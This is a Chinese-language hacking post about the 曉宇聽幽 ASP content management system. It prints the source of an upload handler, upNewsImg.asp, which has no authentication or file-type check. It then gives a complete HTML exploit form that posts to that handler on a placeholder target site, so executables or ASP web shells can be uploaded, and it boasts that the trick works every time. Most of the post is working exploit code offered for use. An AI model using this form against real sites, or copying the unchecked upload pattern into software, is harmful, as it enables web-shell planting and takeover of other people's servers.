(作者給我們留下后門?)
曉宇聽幽網(wǎng)站內(nèi)容管理系統(tǒng):
目前最強大整站系統(tǒng)：包含一般網(wǎng)站所必須的模塊如新聞文章、下載、影視、圖片、音樂等各模塊相互獨立又緊密聯(lián)系，無限分級，自由調(diào)用，支持模板，前臺全部生成html，最大程度節(jié)省系統(tǒng)資源，大中型門戶網(wǎng)站的最佳選擇

內(nèi)容頁面是生成html,比較安全,后臺地方看了一下,好像也問題不大.
但是轉(zhuǎn)到upload目錄,發(fā)現(xiàn)兩個文件
uploadset.asp upNewsIMg.asp
其中uploadset.asp中做了驗證,而upNewsImg.asp中沒有任何限制,我們來看一下源代碼:

CODE:

<link rel="stylesheet" type="text/css" href="../admin/admin.css">
<script language="JavaScript">
<!-- Hide from older browsers...

//Function to add pic
function Addpic(imagePath){   
  window.opener.frames.message.focus();                     
  window.opener.frames.message.document.execCommand(’InsertImage’, false, imagePath);
}

// -->
</script>

<% server.scripttimeout=1900 %>
<%
UpFilePath="NewsIMG/"
fileweb="UPLOAD/"
nameset =1
pathset =0
dim i
i=1
%>
<% 
function makefilename(fname)
fname = now()
fname = replace(fname,"-","")
fname = replace(fname," ","") 
fname = replace(fname,":","")
makefilename=fname
end function 
%>
<!--#include FILE="upload_5xsoft.inc"-->
<%
dim upload,file,formName,iCount
dim url,url1
set upload=new upload_5xSoft ’’建立上傳對象

iCount=0
for each formName in upload.file ’’列出所有上傳了的文件
set file=upload.file(formName) ’’生成一個文件對象
if file.FileSize>0 then       ’’如果 FileSize > 0 說明有文件數(shù)據(jù)
fname = makefilename(now()) & iCount & "." & GetExtendName(file.FileName)
file.SaveAs Server.mappath(UpFilePath&fname)   ’’保存文件
iCount=iCount+1
response.write"圖片"&i&" <input type=""text"" name="""&i&""" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(’../"&fileweb&UpFilePath&fname&"’)"">點擊這里把圖片"&i&"添加到編輯器中</a> ]<br>"
i=i+1
set file=nothing
end if
next
set upload=nothing ’’刪除此對象

function GetExtendName(FileName)
dim ExtName
ExtName = LCase(FileName)
ExtName = right(ExtName,3)
ExtName = right(ExtName,3-Instr(ExtName,"."))
GetExtendName = ExtName
end function
%>

[Copy to clipboard]


哈哈,完全可以自己購造一個上傳頁面,直接上傳,連exe文件都可以,別說asp什么的啦.
而且上傳完就有地址,簡直就是作者給我們留的一個后門.
利用文件:

CODE:

<html>
<head>
<title>文件上傳</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="http://www.target.com/upload/upnewsimg.asp" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
  <center>
  <table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
    <tr>
    <th height="16" align="left" valign="middle">
    <div align="center">
      <b>圖片上傳</b>
    </div>
    </th>
    </tr>
    <tr align="left" valign="middle" bgcolor="#eeeeee">
    <td bgcolor="#FFFFFF" height="1" valign="top">
<input type="file" name="file1" style="width:200" class="tx1">

      
    </td>
    </tr>
    <tr align="center" valign="middle">
    <td align="left" id="upid" height="5" bgcolor="#FFFFFF">
    </td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
    <td bgcolor="#FFFFFF" height="28">
    <input type="submit" name="Submit" value="· 提交 ·" class="bt">
    <input type="reset" name="Submit2" value="· 重執(zhí) ·" class="bt"></td>
    </tr>
    <tr align="center" valign="middle" bgcolor="#eeeeee">
    <td height="14" bgcolor="#FFFFFF">　</td>
    </tr>
  </table>
  </center>
</div>
</form>

</body>

</html>

[Copy to clipboard]


百發(fā)百中,哈哈.好玩.
我的Blog     http://hhuai.cn
文章：壞壞
來源：邪惡八進制信息安全團隊 

最新評論